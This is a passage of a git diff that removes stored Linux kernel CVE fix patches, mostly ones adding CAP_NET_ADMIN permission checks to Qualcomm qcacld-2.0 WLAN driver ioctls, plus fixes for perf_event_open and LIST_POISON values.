diff --git a/Patches/Linux_CVEs/CVE-2016-0806/qcacld-2.0/0017.patch b/Patches/Linux_CVEs/CVE-2016-0806/qcacld-2.0/0017.patch
deleted file mode 100644
index a1afccc9..00000000
--- a/Patches/Linux_CVEs/CVE-2016-0806/qcacld-2.0/0017.patch
+++ /dev/null
@@ -1,41 +0,0 @@
-From 2882941530cbf804e280f235f7f8d76179a423fe Mon Sep 17 00:00:00 2001
-From: Amarnath Hullur Subramanyam
-Date: Wed, 28 Oct 2015 21:03:01 -0700
-Subject: wlan:Check priviledge permission before processing SET_CHAR_GET_NONE
- IOCTL
-
-Kernel assumes all SET IOCTL commands are assigned with even
-numbers. But in our WLAN driver, some SET IOCTLS are assigned with
-odd numbers. This leads kernel fail to check, for some SET IOCTLs,
-whether user has the right permission to do SET operation.
-Hence, in driver, before processing SET_CHAR_GET_NONE IOCTLs, making
-sure user task has right permission to process the command.
-
-CRs-Fixed: 930935
-Git-commit: 0e53a89bfe0dbb50e0dde9a6960d274386247cd9
-Bug: 25344453
-Signed-off-by: Amarnath Hullur Subramanyam
----
- drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_wext.c | 6 ++++++
- 1 file changed, 6 insertions(+)
-
-diff --git a/drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_wext.c b/drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_wext.c
-index 0b1ee24..88d75c1 100644
---- a/drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_wext.c
-+++ b/drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_wext.c
-@@ -6200,6 +6200,12 @@ static int iw_setchar_getnone(struct net_device *dev, struct iw_request_info *in
- return -EBUSY;
- }
-
-+ if (!capable(CAP_NET_ADMIN)){
-+ VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_ERROR,
-+ FL("permission check failed"));
-+ return -EPERM;
-+ }
-+
- /* helper function to get iwreq_data with compat handling. */
- if (hdd_priv_get_data(&s_priv_data, wrqu)) {
- return -EINVAL;
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-0806/qcacld-2.0/0018.patch b/Patches/Linux_CVEs/CVE-2016-0806/qcacld-2.0/0018.patch
deleted file mode 100644
index b370fb21..00000000
--- a/Patches/Linux_CVEs/CVE-2016-0806/qcacld-2.0/0018.patch
+++ /dev/null
@@ -1,41 +0,0 @@
-From 825827ab2aa271f23f48aa683046a3aa3f7fe90e Mon Sep 17 00:00:00 2001
-From: Amarnath Hullur Subramanyam
-Date: Wed, 28 Oct 2015 21:04:10 -0700
-Subject: wlan:Check priviledge permission before processing SET_PACKET_FILTER
- IOCTL
-
-Kernel assumes all SET IOCTL commands are assigned with even
-numbers. But in our WLAN driver, some SET IOCTLS are assigned with
-odd numbers. This leads kernel fail to check, for some SET IOCTLs,
-whether user has the right permission to do SET operation.
-Hence, in driver, before processing SET_PACKET_FILTER IOCTL, making
-sure user task has right permission to process the command.
-
-CRs-Fixed: 930937
-Git-commit: 88ce639e7a0bba852f193b6f53b7ca1926a09b02
-Bug: 25344453
-Signed-off-by: Amarnath Hullur Subramanyam
----
- drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_wext.c | 6 ++++++
- 1 file changed, 6 insertions(+)
-
-diff --git a/drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_wext.c b/drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_wext.c
-index 88d75c1..09d7288 100644
---- a/drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_wext.c
-+++ b/drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_wext.c
-@@ -8720,6 +8720,12 @@ static int iw_set_packet_filter_params(struct net_device *dev,
- int ret;
- struct iw_point s_priv_data;
-
-+ if (!capable(CAP_NET_ADMIN)) {
-+ VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_ERROR,
-+ FL("permission check failed"));
-+ return -EPERM;
-+ }
-+
- if (hdd_priv_get_data(&s_priv_data, wrqu)) {
- return -EINVAL;
- }
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-0806/qcacld-2.0/0019.patch b/Patches/Linux_CVEs/CVE-2016-0806/qcacld-2.0/0019.patch
deleted file mode 100644
index 39b3431e..00000000
--- a/Patches/Linux_CVEs/CVE-2016-0806/qcacld-2.0/0019.patch
+++ /dev/null
@@ -1,40 +0,0 @@
-From 27d3007a7635ccca7ae9bfb98c89724652dcbc3b Mon Sep 17 00:00:00 2001
-From: Amarnath Hullur Subramanyam
-Date: Wed, 28 Oct 2015 21:05:26 -0700
-Subject: wlan:Check priviledge permission for QCSAP_IOCTL_SETWPSIE
-
-Kernel assumes all SET IOCTL commands are assigned with even
-numbers. But in our WLAN driver, some SET IOCTLS are assigned with
-odd numbers. This leads kernel fail to check, for some SET IOCTLs,
-whether user has the right permission to do SET operation.
-Hence, in driver, before processing QCSAP_IOCTL_SETWPSIE IOCTL,
-making sure user task has right permission to process the command.
-
-CRs-Fixed: 930944
-Git-commit: 2905578424256be07e6b9d8c63bb83d40cc52a71
-Bug: 25344453
-Signed-off-by: Amarnath Hullur Subramanyam
----
- drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_hostapd.c | 6 ++++++
- 1 file changed, 6 insertions(+)
-
-diff --git a/drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_hostapd.c b/drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_hostapd.c
-index 51ee547..77b4124 100644
---- a/drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_hostapd.c
-+++ b/drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_hostapd.c
-@@ -3884,6 +3884,12 @@ static int iw_softap_setwpsie(struct net_device *dev,
-
- ENTER();
-
-+ if (!capable(CAP_NET_ADMIN)) {
-+ VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_ERROR,
-+ FL("permission check failed"));
-+ return -EPERM;
-+ }
-+
- /* helper function to get iwreq_data with compat handling. */
- if (hdd_priv_get_data(&s_priv_data, wrqu)) {
- return -EINVAL;
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-0806/qcacld-2.0/0020.patch b/Patches/Linux_CVEs/CVE-2016-0806/qcacld-2.0/0020.patch
deleted file mode 100644
index d707171c..00000000
--- a/Patches/Linux_CVEs/CVE-2016-0806/qcacld-2.0/0020.patch
+++ /dev/null
@@ -1,41 +0,0 @@
-From 89c3372735486a2f7f6b35298fcf246e7e177ac0 Mon Sep 17 00:00:00 2001
-From: Amarnath Hullur Subramanyam
-Date: Wed, 28 Oct 2015 21:06:39 -0700
-Subject: wlan:Check priviledge permission for QCSAP_IOCTL_DISASSOC_STA
-
-Kernel assumes all SET IOCTL commands are assigned with even
-numbers. But in our WLAN driver, some SET IOCTLS are assigned with
-odd numbers. This leads kernel fail to check, for some SET IOCTLs,
-whether user has the right permission to do SET operation.
-Hence, in driver, before processing QCSAP_IOCTL_DISASSOC_STA IOCTL,
-making sure user task has right permission to process the command.
-
-CRs-Fixed: 930946
-Git-commit: be62ecde85228b91c66fb047e27d25132f56bd0d
-Bug: 25344453
-Signed-off-by: Amarnath Hullur Subramanyam
----
- drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_hostapd.c | 7 +++++++
- 1 file changed, 7 insertions(+)
-
-diff --git a/drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_hostapd.c b/drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_hostapd.c
-index 77b4124..b95a853 100644
---- a/drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_hostapd.c
-+++ b/drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_hostapd.c
-@@ -3243,6 +3243,13 @@ static iw_softap_disassoc_sta(struct net_device *dev,
- struct tagCsrDelStaParams delStaParams;
-
- ENTER();
-+
-+ if (!capable(CAP_NET_ADMIN)) {
-+ VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_ERROR,
-+ FL("permission check failed"));
-+ return -EPERM;
-+ }
-+
- /* iwpriv tool or framework calls this ioctl with
- * data passed in extra (less than 16 octets);
- */
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-0806/qcacld-2.0/0021.patch b/Patches/Linux_CVEs/CVE-2016-0806/qcacld-2.0/0021.patch
deleted file mode 100644
index 2da030ed..00000000
--- a/Patches/Linux_CVEs/CVE-2016-0806/qcacld-2.0/0021.patch
+++ /dev/null
@@ -1,40 +0,0 @@
-From e2addf5aa2c7dfc537c2b80d8cc1cb5640346535 Mon Sep 17 00:00:00 2001
-From: Amarnath Hullur Subramanyam
-Date: Wed, 28 Oct 2015 21:07:47 -0700
-Subject: wlan:Check priviledge permission for SET_BAND_CONFIG IOCTL
-
-Kernel assumes all SET IOCTL commands are assigned with even
-numbers. But in our WLAN driver, some SET IOCTLS are assigned with
-odd numbers. This leads kernel fail to check, for some SET IOCTLs,
-whether user has the right permission to do SET operation.
-Hence, in driver, before processing SET_BAND_CONFIG IOCTL, making
-sure user task has right permission to process the command.
-
-CRs-Fixed: 930952
-Git-commit: 6642bccf3ed8cba176dee7d4bbc21fc4580efb7b
-Bug: 25344453
-Signed-off-by: Amarnath Hullur Subramanyam
----
- drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_wext.c | 6 ++++++
- 1 file changed, 6 insertions(+)
-
-diff --git a/drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_wext.c b/drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_wext.c
-index 09d7288..1cbdf32 100644
---- a/drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_wext.c
-+++ b/drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_wext.c
-@@ -9417,6 +9417,12 @@ static int iw_set_band_config(struct net_device *dev,
- return -EBUSY;
- }
-
-+ if (!capable(CAP_NET_ADMIN)) {
-+ VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_ERROR,
-+ FL("permission check failed"));
-+ return -EPERM;
-+ }
-+
- return hdd_setBand(dev, value[0]);
- }
-
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-0806/qcacld-2.0/0022.patch b/Patches/Linux_CVEs/CVE-2016-0806/qcacld-2.0/0022.patch
deleted file mode 100644
index 57d4597a..00000000
--- a/Patches/Linux_CVEs/CVE-2016-0806/qcacld-2.0/0022.patch
+++ /dev/null
@@ -1,40 +0,0 @@
-From e474427496ccb784878e10978f25b6e85de68850 Mon Sep 17 00:00:00 2001
-From: Amarnath Hullur Subramanyam
-Date: Wed, 28 Oct 2015 21:10:14 -0700
-Subject: wlan:Check priviledge permission for SET_POWER_PARAMS IOCTL
-
-Kernel assumes all SET IOCTL commands are assigned with even
-numbers. But in our WLAN driver, some SET IOCTLS are assigned with
-odd numbers. This leads kernel fail to check, for some SET IOCTLs,
-whether user has the right permission to do SET operation.
-Hence, in driver, before processing SET_POWER_PARAMS IOCTL, making
-sure user task has right permission to process the command.
-
-CRs-Fixed: 930953
-Git-commit: 6665a9697b404acf4d2e7d52d9c2b19512c9b239
-Bug: 25344453
-Signed-off-by: Amarnath Hullur Subramanyam
----
- drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_wext.c | 6 ++++++
- 1 file changed, 6 insertions(+)
-
-diff --git a/drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_wext.c b/drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_wext.c
-index 1cbdf32..841ed4c 100644
---- a/drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_wext.c
-+++ b/drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_wext.c
-@@ -9434,6 +9434,12 @@ static int iw_set_power_params_priv(struct net_device *dev,
- char *ptr;
- VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_INFO,
- "Set power params Private");
-+
-+ if (!capable(CAP_NET_ADMIN)) {
-+ VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_ERROR,
-+ FL("permission check failed"));
-+ return -EPERM;
-+ }
- /* ODD number is used for set, copy data using copy_from_user */
- ptr = mem_alloc_copy_from_user_helper(wrqu->data.pointer,
- wrqu->data.length);
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-0806/qcacld-2.0/0023.patch b/Patches/Linux_CVEs/CVE-2016-0806/qcacld-2.0/0023.patch
deleted file mode 100644
index c3e37212..00000000
--- a/Patches/Linux_CVEs/CVE-2016-0806/qcacld-2.0/0023.patch
+++ /dev/null
@@ -1,40 +0,0 @@
-From 967f88782e93809cfb27a60b82a3a069d2a52fc4 Mon Sep 17 00:00:00 2001
-From: Amarnath Hullur Subramanyam
-Date: Wed, 28 Oct 2015 21:12:55 -0700
-Subject: wlan:Check priviledge permission for CLEAR_MCBC_FILTER IOCTL
-
-Kernel assumes all SET IOCTL commands are assigned with even
-numbers. But in our WLAN driver, some SET IOCTLS are assigned with
-odd numbers. This leads kernel fail to check, for some SET IOCTLs,
-whether user has the right permission to do SET operation.
-Hence, in driver, before processing CLEAR_MCBC_FILTER IOCTL, making
-sure user task has right permission to process the command.
-
-CRs-Fixed: 930954
-Git-commit: 9eeafd788f53cc37c169b299f91ca9c558b228f9
-Bug: 25344453
-Signed-off-by: Amarnath Hullur Subramanyam
----
- drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_wext.c | 6 ++++++
- 1 file changed, 6 insertions(+)
-
-diff --git a/drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_wext.c b/drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_wext.c
-index 841ed4c..fc8c917 100644
---- a/drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_wext.c
-+++ b/drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_wext.c
-@@ -8143,6 +8143,12 @@ static int iw_clear_dynamic_mcbc_filter(struct net_device *dev,
- tpSirWlanSetRxpFilters wlanRxpFilterParam;
- hddLog(VOS_TRACE_LEVEL_INFO_HIGH, "%s: ", __func__);
-
-+ if (!capable(CAP_NET_ADMIN)) {
-+ VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_ERROR,
-+ FL("permission check failed"));
-+ return -EPERM;
-+ }
-+
- //Reset the filter to INI value as we have to clear the dynamic filter
- pHddCtx->configuredMcastBcastFilter = pHddCtx->cfg_ini->mcastBcastFilterSetting;
-
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-0806/qcacld-2.0/0024.patch b/Patches/Linux_CVEs/CVE-2016-0806/qcacld-2.0/0024.patch
deleted file mode 100644
index 3e094bf9..00000000
--- a/Patches/Linux_CVEs/CVE-2016-0806/qcacld-2.0/0024.patch
+++ /dev/null
@@ -1,40 +0,0 @@
-From 2f7ecc8b88843b3b53bd7d2328f0d53f3794f456 Mon Sep 17 00:00:00 2001
-From: Amarnath Hullur Subramanyam
-Date: Wed, 28 Oct 2015 21:17:28 -0700
-Subject: wlan:Check priviledge permission for SET_THREE_INT_GET_NONE
-
-Kernel assumes all SET IOCTL commands are assigned with even
-numbers. But in our WLAN driver, some SET IOCTLS are assigned with
-odd numbers. This leads kernel fail to check, for some SET IOCTLs,
-whether user has the right permission to do SET operation.
-Hence, in driver, before processing SET_THREE_INT_GET_NONE IOCTL,
-making sure user task has right permission to process the command.
-
-CRs-Fixed: 930948
-Git-commit: aaeeed43f9597631982835481c7cf2621f6455f0
-Bug: 25344453
-Signed-off-by: Amarnath Hullur Subramanyam
----
- drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_wext.c | 6 ++++++
- 1 file changed, 6 insertions(+)
-
-diff --git a/drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_wext.c b/drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_wext.c
-index fc8c917..51b52f3 100644
---- a/drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_wext.c
-+++ b/drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_wext.c
-@@ -6846,6 +6846,12 @@ int iw_set_three_ints_getnone(struct net_device *dev,
- return -EBUSY;
- }
-
-+ if (!capable(CAP_NET_ADMIN)) {
-+ VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_ERROR,
-+ FL("permission check failed"));
-+ return -EPERM;
-+ }
-+
- switch(sub_cmd) {
-
- case WE_SET_WLAN_DBG:
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-0806/qcacld-2.0/0025.patch b/Patches/Linux_CVEs/CVE-2016-0806/qcacld-2.0/0025.patch
deleted file mode 100644
index 76f0bb5b..00000000
--- a/Patches/Linux_CVEs/CVE-2016-0806/qcacld-2.0/0025.patch
+++ /dev/null
@@ -1,39 +0,0 @@
-From 9fd4483e08349eb1570c42da8acbac33e70a6e02 Mon Sep 17 00:00:00 2001
-From: Amarnath Hullur Subramanyam
-Date: Wed, 28 Oct 2015 21:23:09 -0700
-Subject: wlan:Check priviledge permission for SET_VAR_INTS_GETNONE IOCTL
-
-Kernel assumes all SET IOCTL commands are assigned with even
-numbers. But in our WLAN driver, some SET IOCTLS are assigned with
-odd numbers. This leads kernel fail to check, for some SET IOCTLs,
-whether user has the right permission to do SET operation.
-Hence, in driver, before processing SET_VAR_INTS_GETNONE, making
-sure user task has right permission to process the command.
-
-CRs-Fixed: 930942
-Git-commit: 0858d21caf17d56f8d2353590c1ec245073222e0
-Bug: 25344453
-Signed-off-by: Amarnath Hullur Subramanyam
----
- drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_wext.c | 5 +++++
- 1 file changed, 5 insertions(+)
-
-diff --git a/drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_wext.c b/drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_wext.c
-index 51b52f3..ba9d0ff 100644
---- a/drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_wext.c
-+++ b/drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_wext.c
-@@ -7520,6 +7520,11 @@ static int __iw_set_var_ints_getnone(struct net_device *dev,
- int staId = 0;
- struct iw_point s_priv_data;
-
-+ if (!capable(CAP_NET_ADMIN)) {
-+ VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_ERROR,
-+ FL("permission check failed"));
-+ return -EPERM;
-+ }
- /* helper function to get iwreq_data with compat handling. */
- if (hdd_priv_get_data(&s_priv_data, wrqu)) {
- return -EINVAL;
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-0806/qcacld-2.0/0026.patch b/Patches/Linux_CVEs/CVE-2016-0806/qcacld-2.0/0026.patch
deleted file mode 100644
index 45000280..00000000
--- a/Patches/Linux_CVEs/CVE-2016-0806/qcacld-2.0/0026.patch
+++ /dev/null
@@ -1,44 +0,0 @@
-From fb3616763bd5909e86cddd19f3569a26b4f93f49 Mon Sep 17 00:00:00 2001
-From: Amarnath Hullur Subramanyam
-Date: Wed, 28 Oct 2015 21:25:21 -0700
-Subject: wlan: ensure permission for WLAN_FTM_PRIV_SET_CHAR_GET_NONE
-
-prima to qcacld-2.0 propagation.
-
-Kernel assumes all SET IOCTL commands are assigned with even
-numbers. But in our WLAN driver, some SET IOCTLS are assigned with
-odd numbers. This leads kernel fail to check, for some SET IOCTLs,
-whether user has the right permission to do SET operation. Hence,
-in driver, before processing WLAN_FTM_PRIV_SET_CHAR_GET_NONE,
-making sure user task has right permission to process the command.
-
-CRs-Fixed: 930837
-Git-commit: c4928591bbcd131f10f6ea337a4bd6ee3e141c2a
-Git-repo: https://www.codeaurora.org/cgit/quic/la/platform/vendor/qcom-opensource/wlan/prima/
-Bug: 25344453
-Signed-off-by: Amarnath Hullur Subramanyam
----
- drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_wext.c | 7 +++++++
- 1 file changed, 7 insertions(+)
-
-diff --git a/drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_wext.c b/drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_wext.c
-index ba9d0ff..31205f3 100644
---- a/drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_wext.c
-+++ b/drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_wext.c
-@@ -6193,6 +6193,13 @@ static int iw_setchar_getnone(struct net_device *dev, struct iw_request_info *in
- #endif /* WLAN_FEATURE_VOWIFI */
- struct iw_point s_priv_data;
-
-+ if (!capable(CAP_NET_ADMIN))
-+ {
-+ VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_ERROR,
-+ FL("permission check failed"));
-+ return -EPERM;
-+ }
-+
- if ((WLAN_HDD_GET_CTX(pAdapter))->isLogpInProgress)
- {
- VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_FATAL,
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-0806/qcacld-2.0/0027.patch b/Patches/Linux_CVEs/CVE-2016-0806/qcacld-2.0/0027.patch
deleted file mode 100644
index 69f62656..00000000
--- a/Patches/Linux_CVEs/CVE-2016-0806/qcacld-2.0/0027.patch
+++ /dev/null
@@ -1,44 +0,0 @@
-From ca7c085fb70861a55d9d3a46de012a3e0998ca61 Mon Sep 17 00:00:00 2001
-From: Amarnath Hullur Subramanyam
-Date: Wed, 28 Oct 2015 21:27:11 -0700
-Subject: wlan:Check priviledge permission for SET_CHANNEL_RANGE
-
-prima to qcacld-2.0 propagation.
-
-Kernel assumes all SET IOCTL commands are assigned with even
-numbers. But in our WLAN driver, some SET IOCTLS are assigned with
-odd numbers. This leads kernel fail to check, for some SET IOCTLs,
-whether user has the right permission to do SET operation.
-Hence, in driver, before processing SET_CHANNEL_RANGE IOCTL,
-making sure user task has right permission to process the command.
-
-CRs-Fixed: 930555
-Git-commit: bcb1abfd803c6bb98bad35228d7c4f85b754836d
-Git-repo: https://www.codeaurora.org/cgit/quic/la/platform/vendor/qcom-opensource/wlan/prima/
-Bug: 25344453
-Signed-off-by: Amarnath Hullur Subramanyam
----
- drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_wext.c | 7 +++++++
- 1 file changed, 7 insertions(+)
-
-diff --git a/drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_wext.c b/drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_wext.c
-index 31205f3..1b8346d0 100644
---- a/drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_wext.c
-+++ b/drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_wext.c
-@@ -3336,6 +3336,13 @@ static int iw_softap_set_channel_range( struct net_device *dev,
- tHalHandle hHal = WLAN_HDD_GET_HAL_CTX(pHostapdAdapter);
- hdd_context_t *pHddCtx = WLAN_HDD_GET_CTX(pHostapdAdapter);
-
-+ if (!capable(CAP_NET_ADMIN))
-+ {
-+ VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_ERROR,
-+ FL("permission check failed"));
-+ return -EPERM;
-+ }
-+
- status = WLANSAP_SetChannelRange(hHal, startChannel, endChannel, band);
-
- if (VOS_STATUS_SUCCESS != status)
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-0806/qcacld-2.0/0028.patch b/Patches/Linux_CVEs/CVE-2016-0806/qcacld-2.0/0028.patch
deleted file mode 100644
index 05511eac..00000000
--- a/Patches/Linux_CVEs/CVE-2016-0806/qcacld-2.0/0028.patch
+++ /dev/null
@@ -1,44 +0,0 @@
-From f66afdc6840e7647a965487194873826de57e655 Mon Sep 17 00:00:00 2001
-From: Amarnath Hullur Subramanyam
-Date: Sun, 1 Nov 2015 23:04:42 -0800
-Subject: wlan:Check priviledge permission for SET_CHANNEL_RANGE
-
-prima to qcacld-2.0 propagation.
-
-Kernel assumes all SET IOCTL commands are assigned with even
-numbers. But in our WLAN driver, some SET IOCTLS are assigned with
-odd numbers. This leads kernel fail to check, for some SET IOCTLs,
-whether user has the right permission to do SET operation.
-Hence, in driver, before processing SET_CHANNEL_RANGE IOCTL,
-making sure user task has right permission to process the command.
-
-CRs-Fixed: 930555
-Git-commit: bcb1abfd803c6bb98bad35228d7c4f85b754836d
-Git-repo: https://www.codeaurora.org/cgit/quic/la/platform/vendor/qcom-opensource/wlan/prima/
-Bug: 25344453
-Signed-off-by: Amarnath Hullur Subramanyam
----
- drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_hostapd.c | 7 +++++++
- 1 file changed, 7 insertions(+)
-
-diff --git a/drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_hostapd.c b/drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_hostapd.c
-index b95a853..e534763 100644
---- a/drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_hostapd.c
-+++ b/drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_hostapd.c
-@@ -3339,6 +3339,13 @@ static int iw_softap_set_channel_range(struct net_device *dev,
- VOS_STATUS status;
- int ret = 0; /* success */
-
-+ if (!capable(CAP_NET_ADMIN))
-+ {
-+ VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_ERROR,
-+ FL("permission check failed"));
-+ return -EPERM;
-+ }
-+
- status = WLANSAP_SetChannelRange(hHal,startChannel,endChannel,band);
- if(status != VOS_STATUS_SUCCESS)
- {
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-0819/ANY/0001.patch.disabled b/Patches/Linux_CVEs/CVE-2016-0819/ANY/0001.patch.disabled
deleted file mode 100644
index 63017fa5..00000000
--- a/Patches/Linux_CVEs/CVE-2016-0819/ANY/0001.patch.disabled
+++ /dev/null
@@ -1,35 +0,0 @@
-From e32c1b1a3d368afe1b09e81b3087ab8810282e93 Mon Sep 17 00:00:00 2001
-From: Srinivasarao P
-Date: Tue, 1 Mar 2016 12:16:03 +0530
-Subject: perf: duplicate deletion of perf event
-
-a malicious app can open a perf event with constraint_duplicate
-bit set, disable the event, and close the fd. On closing the fd,
-the perf_release() modification causes the kernel to clean up
-the event as if it still were enabled, leading to the event
-being removed from a list twice.
-
-CRs-Fixed: 977563
-Change-Id: I5fbec3722407d2f3d0ff0d9f7097c5889e31fd62
-Signed-off-by: Srinivasarao P
----
- kernel/events/core.c | 3 +++
- 1 file changed, 3 insertions(+)
-
-diff --git a/kernel/events/core.c b/kernel/events/core.c
-index 7dd822b..868300d 100644
---- a/kernel/events/core.c
-+++ b/kernel/events/core.c
-@@ -6243,6 +6243,9 @@ SYSCALL_DEFINE5(perf_event_open,
- if (err)
- return err;
-
-+ if (attr.constraint_duplicate || attr.__reserved_1)
-+ return -EINVAL;
-+
- if (!attr.exclude_kernel) {
- if (perf_paranoid_kernel() && !capable(CAP_SYS_ADMIN))
- return -EACCES;
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-0821/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-0821/ANY/0001.patch
deleted file mode 100644
index 7fd8ff5f..00000000
--- a/Patches/Linux_CVEs/CVE-2016-0821/ANY/0001.patch
+++ /dev/null
@@ -1,45 +0,0 @@
-From 8a5e5e02fc83aaf67053ab53b359af08c6c49aaf Mon Sep 17 00:00:00 2001
-From: Vasily Kulikov
-Date: Wed, 9 Sep 2015 15:36:00 -0700
-Subject: [PATCH] include/linux/poison.h: fix LIST_POISON{1,2} offset
-
-Poison pointer values should be small enough to find a room in
-non-mmap'able/hardly-mmap'able space. E.g. on x86 "poison pointer space"
-is located starting from 0x0. Given unprivileged users cannot mmap
-anything below mmap_min_addr, it should be safe to use poison pointers
-lower than mmap_min_addr.
-
-The current poison pointer values of LIST_POISON{1,2} might be too big for
-mmap_min_addr values equal or less than 1 MB (common case, e.g. Ubuntu
-uses only 0x10000). There is little point to use such a big value given
-the "poison pointer space" below 1 MB is not yet exhausted. Changing it
-to a smaller value solves the problem for small mmap_min_addr setups.
-
-The values are suggested by Solar Designer:
-http://www.openwall.com/lists/oss-security/2015/05/02/6
-
-Signed-off-by: Vasily Kulikov
-Cc: Solar Designer
-Cc: Thomas Gleixner
-Cc: "Kirill A. Shutemov"
-Signed-off-by: Andrew Morton
-Signed-off-by: Linus Torvalds
----
- include/linux/poison.h | 4 ++--
- 1 file changed, 2 insertions(+), 2 deletions(-)
-
-diff --git a/include/linux/poison.h b/include/linux/poison.h
-index 2110a81c5e2af..253c9b4198eff 100644
---- a/include/linux/poison.h
-+++ b/include/linux/poison.h
-@@ -19,8 +19,8 @@
- * under normal circumstances, used to verify that nobody uses
- * non-initialized list entries.
- */
--#define LIST_POISON1 ((void *) 0x00100100 + POISON_POINTER_DELTA)
--#define LIST_POISON2 ((void *) 0x00200200 + POISON_POINTER_DELTA)
-+#define LIST_POISON1 ((void *) 0x100 + POISON_POINTER_DELTA)
-+#define LIST_POISON2 ((void *) 0x200 + POISON_POINTER_DELTA)
-
- /********** include/linux/timer.h **********/
- /*
diff --git a/Patches/Linux_CVEs/CVE-2016-0823/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-0823/ANY/0001.patch
deleted file mode 100644
index f01f6922..00000000
--- a/Patches/Linux_CVEs/CVE-2016-0823/ANY/0001.patch
+++ /dev/null
@@ -1,45 +0,0 @@
